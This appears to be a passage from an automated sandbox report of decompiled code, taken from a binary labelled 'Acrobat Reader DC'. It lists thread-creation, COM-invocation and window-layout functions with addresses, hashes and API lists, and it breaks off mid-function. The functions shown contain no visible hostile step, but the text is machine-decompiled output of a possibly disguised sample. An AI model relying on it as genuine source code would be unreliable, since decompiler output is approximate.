                                  • String ID:
                                  • API String ID: 1792922140-0
                                  • Opcode ID: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                                  • Opcode Fuzzy Hash: 98bdb4639f13a2aff9c284aaa5c14a4e0db979becac89074174bb9299657736d
                                  • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00413D7F Relevance: 12.1, APIs: 8, Instructions: 63threadCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 93%
                                  			E00413D7F(struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t16;
				DWORD* _t21;
				void* _t33;
				char _t34;
				void* _t36;

				_t34 = _a12;
				_t26 = 0;
				_t38 = _t34;
				if(_t34 != 0) {
					E004178AE();
					_t36 = E00416B49(1, 0x214);
					__eflags = _t36;
					if(__eflags == 0) {
						L7:
						E00413748(_t36);
						__eflags = _t26;
						if(_t26 != 0) {
							E00417F9D(_t26);
						}
						_t16 = 0;
						__eflags = 0;
						L10:
						return _t16;
					}
					_push( *((intOrPtr*)(E00417A69(0, __eflags) + 0x6c)));
					_push(_t36);
					E0041793C(0, _t33, _t34, _t36, __eflags);
					 *(_t36 + 4) =  *(_t36 + 4) | 0xffffffff;
					 *((intOrPtr*)(_t36 + 0x58)) = _a16;
					_t21 = _a24;
					 *((intOrPtr*)(_t36 + 0x54)) = _t34;
					__eflags = _t21;
					if(_t21 == 0) {
						_t21 =  &_a12;
					}
					_t16 = CreateThread(_a4, _a8, E00413D1A, _t36, _a20, _t21);
					__eflags = _t16;
					if(_t16 != 0) {
						goto L10;
					} else {
						_t26 = GetLastError();
						goto L7;
					}
				}
				 *((intOrPtr*)(E00417F77(_t38))) = 0x16;
				E00417F25();
				return 0;
			}












                                  0x00413d86
                                  0x00413d89
                                  0x00413d8b
                                  0x00413d8d
                                  0x00413da4
                                  0x00413db5
                                  0x00413db9
                                  0x00413dbb
                                  0x00413e06
                                  0x00413e07
                                  0x00413e0d
                                  0x00413e0f
                                  0x00413e12
                                  0x00413e17
                                  0x00413e18
                                  0x00413e18
                                  0x00413e1a
                                  0x00000000
                                  0x00413e1a
                                  0x00413dc2
                                  0x00413dc5
                                  0x00413dc6
                                  0x00413dce
                                  0x00413dd2
                                  0x00413dd5
                                  0x00413dda
                                  0x00413ddd
                                  0x00413ddf
                                  0x00413de1
                                  0x00413de1
                                  0x00413df4
                                  0x00413dfa
                                  0x00413dfc
                                  0x00000000
                                  0x00413dfe
                                  0x00413e04
                                  0x00000000
                                  0x00413e04
                                  0x00413dfc
                                  0x00413d94
                                  0x00413d9a
                                  0x00000000

                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                                  • String ID:
                                  • API String ID: 73303432-0
                                  • Opcode ID: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                  • Opcode Fuzzy Hash: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0047974B Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 349COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E0047974B(void* __fp0, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr* _a16, char _a19, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				char _v36;
				char _v40;
				char _v60;
				char _v92;
				signed int _v224;
				signed char _v232;
				signed int _v236;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t152;
				signed int _t159;
				signed int _t166;
				signed int _t168;
				signed int _t172;
				intOrPtr _t174;
				signed int _t186;
				signed int _t188;
				signed int _t195;
				signed char _t196;
				signed int _t203;
				signed int _t204;
				signed char _t205;
				short* _t206;
				short* _t207;
				intOrPtr* _t217;
				signed int _t221;
				intOrPtr* _t240;
				intOrPtr _t257;
				signed int _t259;
				signed int _t263;
				signed int _t264;
				signed int _t265;
				void* _t266;
				void* _t267;
				void* _t268;
				void* _t275;

				_t275 = __fp0;
				_t240 = _a16;
				_t263 =  *(_a24 + 8);
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v40 = 0xfffffffd;
				_v12 = 0;
				_v16 = 0;
				_a19 = 0;
				if(_t240 == 0 || _a12 == 0 || _a20 == 0) {
					return E00451B42(_a4, 1, 0, L"NULL Pointer assignment", 1);
				} else {
					if(E00432416(_t240) != 0) {
						_t264 =  *( *_t240 + 8);
						__eflags = _t264;
						if(_t264 != 0) {
							_v236 = 0;
							_t152 = E00441EBA(_t264, _a20,  &_v12);
							_t268 = _t267 + 0xc;
							__eflags = _t152;
							if(_t152 >= 0) {
								__eflags = _a8 - 1;
								if(__eflags == 0) {
									_t194 = _v12;
									_a8 = 3;
									__eflags = _v12;
									if(__eflags != 0) {
										_t195 = E00451D2B(_t264, _t194, _a20,  &_v236);
										_t268 = _t268 + 0x10;
										__eflags = _t195;
										if(__eflags >= 0) {
											_t196 = _v232;
											__eflags = _t196 & 0x00000001;
											if((_t196 & 0x00000001) != 0) {
												__eflags = _v224;
												if(_v224 == 0) {
													_a19 = 1;
												}
											}
											__eflags = _t196 - 1;
											if(__eflags == 0) {
												_a8 = _t196;
											}
										}
									}
								}
								_t203 = _t263 + 1;
								_push( ~(0 | __eflags > 0x00000000) | ( ~(0 | __eflags > 0x00000000) | _t203 * 0x00000010) + 0x00000004);
								_t159 = E00410E53(_t263, _t264, __eflags);
								__eflags = _t159;
								if(_t159 == 0) {
									_a20 = 0;
								} else {
									 *_t159 = _t203;
									_t41 = _t159 + 4; // 0x4
									_a20 = _t41;
									E00410CA0(_t263 + 1, 0x437095, _t41, 0x10);
								}
								_t204 = 0;
								__eflags = _t263;
								if(_t263 != 0) {
									_t259 = _t263 + _t263;
									__eflags = _t259;
									_t49 = _t259 * 8; // -16
									_v8 = _a20 + _t49 - 0x10;
									do {
										E00479714( *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)), _t263, _t275, _v8,  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)));
										_v8 = _v8 - 0x10;
										_t204 = _t204 + 1;
										__eflags = _t204 - _t263;
									} while (_t204 < _t263);
								}
								__eflags = _v236;
								if(_v236 != 0) {
									_t186 = 0;
									_v8 = 0;
									__eflags = _t263;
									if(_t263 != 0) {
										_t63 = (_t263 + _t263) * 8; // -16
										_t207 = _a20 + _t63 - 0x10;
										do {
											__eflags =  *((short*)(_t266 + _t186 * 4 - 0xd6)) - 2;
											if( *((short*)(_t266 + _t186 * 4 - 0xd6)) == 2) {
												__imp__#9(_t207);
												_t188 = _v8;
												 *_t207 =  *((intOrPtr*)(_t266 + _t188 * 4 - 0xd8));
												_t257 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t188 * 4));
												__eflags =  *((intOrPtr*)(_t257 + 8)) - 6;
												if( *((intOrPtr*)(_t257 + 8)) != 6) {
													 *((intOrPtr*)(_t207 + 8)) = _t207;
												}
											}
											_t186 = _v8 + 1;
											_t207 = _t207 - 0x10;
											_v8 = _t186;
											__eflags = _t186 - _t263;
										} while (_t186 < _t263);
									}
								}
								_t205 = _a8;
								_v28 = _t263;
								_v36 = _a20;
								__eflags = _t205 & 0x0000000c;
								if((_t205 & 0x0000000c) != 0) {
									_v24 = 1;
									_v32 =  &_v40;
								}
								__imp__#8( &_v60);
								E00412F40( &_v92, 0, 0x20);
								__eflags = _a19;
								if(_a19 == 0) {
									_push( &_v20);
									_push( &_v92);
									_push( &_v60);
									_push( &_v36);
									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
								} else {
									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
									_push( &_v20);
									_push( &_v92);
									_push(0);
									_push( &_v36);
								}
								_t166 =  *_t217(_t264, _v12, 0x482a18, 0x800, _t205);
								__eflags = _t166 - 0x80020003;
								if(_t166 != 0x80020003) {
									L38:
									__eflags = _t166;
									if(_t166 >= 0) {
										E00468070(_a12,  &_v60);
										_t265 = 0;
										__eflags = _t263;
										if(_t263 != 0) {
											_t172 = _t263 + _t263;
											__eflags = _t172;
											_t121 = _t172 * 8; // -16
											_t206 = _a20 + _t121 - 0x10;
											do {
												__eflags = _v236;
												if(_v236 == 0) {
													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
													if( *((intOrPtr*)(_t174 + 8)) == 6) {
														goto L52;
													}
												} else {
													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
													_t221 =  *(_t266 + _t265 * 4 - 0xd8) & 0x0000ffff;
													if( *((intOrPtr*)(_t174 + 8)) == 6) {
														__eflags = _t221 - 0x6013;
														if(_t221 != 0x6013) {
															__eflags =  *(_t266 + _t265 * 4 - 0xd6) & 0x00000002;
															if(( *(_t266 + _t265 * 4 - 0xd6) & 0x00000002) != 0) {
																L52:
																E00468070(E00432508(_t174), _t206);
															} else {
																__eflags = _t221 & 0x00004000;
																if((_t221 & 0x00004000) != 0) {
																	goto L52;
																} else {
																	__eflags =  *_t206 - 8;
																	if( *_t206 == 8) {
																		goto L52;
																	}
																}
															}
														}
													}
												}
												_t265 = _t265 + 1;
												_t206 = _t206 - 0x10;
												__eflags = _t265 - _t263;
											} while (_t265 < _t263);
										}
									} else {
										__eflags = _t166 - 0x80020009;
										if(_t166 != 0x80020009) {
											goto L41;
										} else {
											_v16 = E00451B42(_a4, _t166,  &_v92, 0, 1);
										}
									}
								} else {
									__eflags = _v24 - 1;
									if(_v24 != 1) {
										L41:
										_v16 = E00451B42(_a4, _t166, 0, 0, 1);
									} else {
										__eflags = _t205 - 4;
										_t104 = _t205 == 4;
										__eflags = _t104;
										_t166 =  *((intOrPtr*)( *((intOrPtr*)( *_t264 + 0x18))))(_t264, _v12, 0x482a18, 0x800, 4 + (0 | _t104) * 4,  &_v36, 0,  &_v92,  &_v20);
										goto L38;
									}
								}
								__imp__#9( &_v60);
								_t168 = _a20;
								__eflags = _t168;
								if(_t168 != 0) {
									E00470028(_t168);
								}
								return _v16;
							} else {
								return E00451B42(_a4, _t152, 0, 0, 1);
							}
						} else {
							return E00451B42(_a4, 4, 0, L"NULL Pointer assignment", 1);
						}
					} else {
						return E00451B42(_a4, 2, 0, L"Not an Object type", 1);
					}
				}
			}















































                                  0x0047974b
                                  0x00479754
                                  0x0047975f
                                  0x00479762
                                  0x00479765
                                  0x00479768
                                  0x0047976b
                                  0x0047976e
                                  0x00479775
                                  0x00479778
                                  0x0047977b
                                  0x00479780
                                  0x00479b06
                                  0x00479798
                                  0x004797a0
                                  0x004797c0
                                  0x004797c3
                                  0x004797c5
                                  0x004797ec
                                  0x004797f2
                                  0x004797f7
                                  0x004797fa
                                  0x004797fc
                                  0x00479815
                                  0x0047981a
                                  0x0047981c
                                  0x0047981f
                                  0x00479826
                                  0x00479828
                                  0x00479837
                                  0x0047983c
                                  0x0047983f
                                  0x00479841
                                  0x00479843
                                  0x00479849
                                  0x0047984b
                                  0x0047984d
                                  0x00479854
                                  0x00479856
                                  0x00479856
                                  0x00479854
                                  0x0047985a
                                  0x0047985d
                                  0x0047985f
                                  0x0047985f
                                  0x0047985d
                                  0x00479841
                                  0x00479828
                                  0x00479864
                                  0x00479883
                                  0x00479884
                                  0x0047988c
                                  0x0047988e
                                  0x004798af
                                  0x00479890
                                  0x00479890
                                  0x00479892
                                  0x0047989f
                                  0x004798a2
                                  0x004798aa
                                  0x004798b6
                                  0x004798b8
                                  0x004798ba
                                  0x004798c1
                                  0x004798c1
                                  0x004798c3
                                  0x004798c7
                                  0x004798ca
                                  0x004798d8
                                  0x004798dd
                                  0x004798e1
                                  0x004798e2
                                  0x004798e2
                                  0x004798ca
                                  0x004798e6
                                  0x004798ed
                                  0x004798ef
                                  0x004798f1
                                  0x004798f4
                                  0x004798f6
                                  0x004798ff
                                  0x004798ff
                                  0x0047990b
                                  0x0047990b
                                  0x00479914
                                  0x00479917
                                  0x0047991d
                                  0x0047992b
                                  0x00479931
                                  0x00479934
                                  0x00479938
                                  0x0047993a
                                  0x0047993a
                                  0x00479938
                                  0x00479940
                                  0x00479941
                                  0x00479944
                                  0x00479947
                                  0x00479947
                                  0x0047990b
                                  0x004798f6
                                  0x0047994b
                                  0x00479951
                                  0x00479954
                                  0x00479957
                                  0x0047995a
                                  0x0047995f
                                  0x00479966
                                  0x00479966
                                  0x0047996d
                                  0x0047997b
                                  0x00479983
                                  0x00479987
                                  0x004799a3
                                  0x004799a7
                                  0x004799ae
                                  0x004799af
                                  0x004799b0
                                  0x00479989
                                  0x0047998b
                                  0x00479991
                                  0x00479995
                                  0x00479996
                                  0x0047999b
                                  0x0047999b
                                  0x004799c3
                                  0x004799c5
                                  0x004799ca
                                  0x00479a07
                                  0x00479a07
                                  0x00479a09
                                  0x00479a4b
                                  0x00479a50
                                  0x00479a52
                                  0x00479a54
                                  0x00479a5b
                                  0x00479a5b
                                  0x00479a5d
                                  0x00479a5d
                                  0x00479a61
                                  0x00479a61
                                  0x00479a68
                                  0x00479aab
                                  0x00479aae
                                  0x00479ab2
                                  0x00000000
                                  0x00000000
                                  0x00479a6a
                                  0x00479a70
                                  0x00479a73
                                  0x00479a77
                                  0x00479a7f
                                  0x00479a86
                                  0x00479a89
                                  0x00479a8b
                                  0x00479a93
                                  0x00479ab4
                                  0x00479abd
                                  0x00479a95
                                  0x00479a95
                                  0x00479a9b
                                  0x00000000
                                  0x00479a9d
                                  0x00479a9d
                                  0x00479aa1
                                  0x00000000
                                  0x00479aa3
                                  0x00479aa1
                                  0x00479a9b
                                  0x00479a93
                                  0x00479a89
                                  0x00479a7f
                                  0x00479ac2
                                  0x00479ac3
                                  0x00479ac6
                                  0x00479ac6
                                  0x00479a61
                                  0x00479a0b
                                  0x00479a0b
                                  0x00479a10
                                  0x00000000
                                  0x00479a12
                                  0x00479a24
                                  0x00479a24
                                  0x00479a10
                                  0x004799cc
                                  0x004799cc
                                  0x004799d0
                                  0x00479a2c
                                  0x00479a3c
                                  0x004799d2
                                  0x004799d6
                                  0x004799da
                                  0x004799da
                                  0x00479a05
                                  0x00000000
                                  0x00479a05
                                  0x004799d0
                                  0x00479ace
                                  0x00479ad4
                                  0x00479ad7
                                  0x00479ad9
                                  0x00479adc
                                  0x00479adc
                                  0x00479aea
                                  0x004797fe
                                  0x00479812
                                  0x00479812
                                  0x004797c7
                                  0x004797e0
                                  0x004797e0
                                  0x004797a2
                                  0x004797bb
                                  0x004797bb
                                  0x004797a0

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorLast
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 2487901850-572801152
                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004404E8 Relevance: 10.8, APIs: 7, Instructions: 271windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 89%
                                  			E004404E8(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				int _v8;
				int _v12;
				int _v16;
				signed int _v20;
				struct HWND__** _v24;
				signed int _v28;
				void* _t152;
				signed int _t153;
				signed int _t159;
				int _t160;
				signed int _t173;
				signed char _t175;
				int _t176;
				struct HWND__* _t179;
				signed char _t181;
				signed char _t186;
				signed int _t189;
				signed int _t201;
				signed int _t207;
				int _t213;
				int _t214;
				signed int _t218;
				intOrPtr _t223;
				signed int _t227;
				signed int _t232;
				intOrPtr _t242;
				signed int _t246;
				signed int _t249;
				signed int _t250;
				signed char _t251;
				struct HWND__** _t260;
				signed int _t261;
				struct HWND__* _t268;
				struct HWND__** _t269;
				void* _t277;
				void* _t295;

				_t213 = _a8;
				_t268 = _a4;
				_t153 = E00430C09(_t152, 0x4a8630, _t268);
				_t223 =  *0x4a8690; // 0x0
				_t260 =  *( *(_t223 + _t153 * 4));
				_v24 = _t260;
				_a4 = _t260[0x11];
				_a8 = _t260[0x12];
				if(_t260[0x68] != 0) {
					_a8 = _a8 - GetSystemMetrics(0xf);
				}
				if(_a4 <= 0 || _a8 <= 0 || _a12 <= 0 || _a16 <= 0 || _t213 == 1) {
					return DefDlgProcW(_t268, 5, _t213, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
				} else {
					_t159 = 3;
					_v28 = 3;
					_t277 =  *0x4a86b4 - _t159; // 0x2
					if(_t277 >= 0) {
						do {
							_t242 =  *0x4a86a4; // 0xa51ad0
							_t269 =  *( *(_t242 + _t159 * 4));
							if(_t269 != 0 && _t269[1] == _t260[1] &&  *_t269 != 0) {
								asm("cdq");
								_t227 = _t269[0x21];
								_t261 = _t269[0x21];
								_v8 = _t269[0x20] * _a12 / _a4;
								asm("cdq");
								_v20 = _t269[0x20] * _a16 / _a8;
								asm("cdq");
								_v16 = _t227 * _a12 / _a4;
								_t173 = _t261 * _a16;
								asm("cdq");
								_t246 = _t173 % _a8;
								_v12 = _t173 / _a8;
								_t175 = _t269[0x1f] & 0x0000ffff;
								if(_t175 == 0) {
									_t176 = _v20;
									_t214 = _v8;
								} else {
									if((_t175 & 0x00000100) == 0) {
										L19:
										_t214 = _v8;
									} else {
										_v16 = _t227;
										if((_t175 & 0x00000006) != 0) {
											goto L19;
										} else {
											_t201 = _a12;
											if((_t175 & 0x00000008) == 0) {
												_t214 = _v8;
												asm("cdq");
												if(_t214 > _t201 - _t246 >> 1) {
													_t218 = _a4;
													_t207 = (_t218 - _t269[0x20] - _v16) * _a12;
													asm("cdq");
													_t246 = _t207 % _t218;
													_t214 = _a12 - _t207 / _t218 - _v16;
													_v8 = _t214;
												}
											} else {
												asm("cdq");
												_t214 = _t269[0x20] + (_t201 - _a4 - _t246 >> 1);
												_v8 = _t214;
											}
										}
									}
									_t186 = _t269[0x1f] & 0x0000ffff;
									if((_t186 & 0x00000200) == 0) {
										L26:
										_t176 = _v20;
									} else {
										_v12 = _t261;
										if((_t186 & 0x00000060) != 0) {
											goto L26;
										} else {
											_t189 = _a16;
											if(_t186 >= 0) {
												asm("cdq");
												_t176 = _v20;
												if(_t176 > _t189 - _t246 >> 1) {
													_t217 = _a8;
													asm("cdq");
													_t214 = _v8;
													_t176 = _a16 - (_a8 - _t269[0x20] - _v12) * _a16 / _t217 - _v12;
												}
											} else {
												asm("cdq");
												_t176 = _t269[0x20] + (_t189 - _a8 - _t246 >> 1);
											}
										}
									}
									_t249 = _t269[0x1f] & 0x0000ffff;
									_v20 = _t249;
									_t250 = _t249 & 0x00000002;
									_v8 = _t250;
									if(_t250 != 0) {
										_t214 = _t269[0x20];
									}
									if((_v20 & 0x00000004) != 0) {
										if(_v8 == 0) {
											_t214 = _t269[0x20] + _t227 - _v16 - _a4 + _a12;
										} else {
											_v16 = _t227 - _t214 - _a4 + _t269[0x20] + _a12;
										}
									}
									_t251 = _v20;
									_t232 = _t251 & 0x00000020;
									if(_t232 != 0) {
										_t176 = _t269[0x20];
									}
									if((_t251 & 0x00000040) != 0) {
										if(_t232 == 0) {
											_t176 = _t269[0x20] + _t261 - _v12 - _a8 + _a16;
										} else {
											_v12 = _t261 - _t176 - _a8 + _t269[0x20] + _a16;
										}
									}
								}
								MoveWindow( *_t269, _t214, _t176, _v16, _v12, 0);
								_t179 = _t269[0x22];
								if(_t179 != 0) {
									if(_t179 != 0x16 || (_t269[0x22] & 0x00000020) != 0) {
										goto L42;
									} else {
										SendMessageW( *_t269, 0x469, _t269[0xc], 0);
										_t181 = _t269[0x22];
										if(_t181 == 0xff) {
											goto L42;
										} else {
											_t260 = _v24;
											if((_t181 & 0x000000ff) != _t260[0x65]) {
												ShowWindow( *_t269, 0);
											}
											goto L43;
										}
									}
									goto L51;
								} else {
									SendMessageW( *_t269, 0x142, 0, 0xffff);
									L42:
									_t260 = _v24;
								}
							}
							L43:
							_t159 = _v28 + 1;
							_v28 = _t159;
							_t295 = _t159 -  *0x4a86b4; // 0x2
						} while (_t295 <= 0);
					}
					_t160 = InvalidateRect( *_t260, 0, 1);
					_t260[0x62] = 1;
					_t260[0xe] = 0;
					return _t160;
				}
				L51:
			}







































                                  0x004404ef
                                  0x004404f3
                                  0x004404fd
                                  0x00440502
                                  0x0044050b
                                  0x0044051a
                                  0x0044051d
                                  0x00440520
                                  0x00440523
                                  0x0044052d
                                  0x0044052d
                                  0x00440534
                                  0x00440823
                                  0x00440561
                                  0x00440561
                                  0x00440566
                                  0x00440569
                                  0x0044056f
                                  0x00440578
                                  0x00440578
                                  0x00440581
                                  0x00440585
                                  0x004405ab
                                  0x004405af
                                  0x004405b6
                                  0x004405bd
                                  0x004405cb
                                  0x004405cf
                                  0x004405d8
                                  0x004405dc
                                  0x004405e1
                                  0x004405e5
                                  0x004405e6
                                  0x004405e9
                                  0x004405ec
                                  0x004405f3
                                  0x0044074e
                                  0x00440751
                                  0x004405f9
                                  0x004405fe
                                  0x00440657
                                  0x00440657
                                  0x00440600
                                  0x00440600
                                  0x00440605
                                  0x00000000
                                  0x00440607
                                  0x00440609
                                  0x0044060c
                                  0x00440626
                                  0x00440629
                                  0x00440630
                                  0x00440632
                                  0x00440643
                                  0x00440647
                                  0x00440648
                                  0x0044064f
                                  0x00440652
                                  0x00440652
                                  0x0044060e
                                  0x00440611
                                  0x0044061f
                                  0x00440621
                                  0x00440621
                                  0x0044060c
                                  0x00440605
                                  0x0044065a
                                  0x00440663
                                  0x004406bb
                                  0x004406bb
                                  0x00440665
                                  0x00440665
                                  0x0044066a
                                  0x00000000
                                  0x0044066c
                                  0x0044066e
                                  0x00440671
                                  0x00440686
                                  0x0044068b
                                  0x00440692
                                  0x00440694
                                  0x004406a9
                                  0x004406ac
                                  0x004406b6
                                  0x004406b6
                                  0x00440673
                                  0x00440676
                                  0x00440682
                                  0x00440682
                                  0x00440671
                                  0x0044066a
                                  0x004406be
                                  0x004406c2
                                  0x004406c5
                                  0x004406c8
                                  0x004406cb
                                  0x004406cd
                                  0x004406cd
                                  0x004406d8
                                  0x004406df
                                  0x00440706
                                  0x004406e1
                                  0x004406f2
                                  0x004406f2
                                  0x004406df
                                  0x00440709
                                  0x0044070e
                                  0x00440711
                                  0x00440713
                                  0x00440713
                                  0x0044071d
                                  0x00440722
                                  0x00440749
                                  0x00440724
                                  0x00440735
                                  0x00440735
                                  0x00440722
                                  0x0044071d
                                  0x00440763
                                  0x00440769
                                  0x00440771
                                  0x004407c1
                                  0x00000000
                                  0x004407cc
                                  0x004407da
                                  0x004407e0
                                  0x004407e8
                                  0x00000000
                                  0x004407ea
                                  0x004407ea
                                  0x004407f6
                                  0x004407fd
                                  0x004407fd
                                  0x00000000
                                  0x004407f6
                                  0x004407e8
                                  0x00000000
                                  0x00440773
                                  0x00440782
                                  0x00440788
                                  0x00440788
                                  0x00440788
                                  0x00440771
                                  0x0044078b
                                  0x0044078e
                                  0x0044078f
                                  0x00440792
                                  0x00440792
                                  0x00440578
                                  0x004407a5
                                  0x004407ab
                                  0x004407b2
                                  0x004407bc
                                  0x004407bc
                                  0x00000000

                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00440527
                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.286865083.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000A.00000002.286858320.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287083979.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287562025.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287926837.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287941418.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.287967313.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000A.00000002.288002325.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_10_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                  • String ID:
                                  • API String ID: 1457242333-0
                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0044734F Relevance: 10.7, APIs: 7, Instructions: 210COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E0044734F(void* __fp0, long* _a4, intOrPtr _a8, char _a11) {
				long _v8;
				struct tagPOINT* _v12;
				long _v16;
				long _v20;
				int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v68;
				void* _t97;
				struct tagPOINT* _t99;
				long _t100;
				intOrPtr _t108;
				intOrPtr _t109;
				intOrPtr _t110;
				void* _t112;
				long* _t113;

				_t113 = _a4;
				_t109 = _a8;
				_t100 = 0xfffffffe;
				_a11 = 0;
				_v20 = 0;
				_v16 = 0xfffffffe;
				_v24 = 1;
				_v28 = _t109;
				if(_t109 == 0) {
					L26:
					E0042FD29(_t113, _t100);
					return _a11;
				}
				while(1) {
					_v12 = 0;
					E0044719B(_t113, _v20, _t100, 0, _v24);
					if( *((intOrPtr*)(_t109 + 0xc)) <= 0) {
						goto L25;
					}
					_v8 = _t109 + 0x10;
					_a4 = _t109 + 0x14;
					do {
						_t112 =  *_v8;
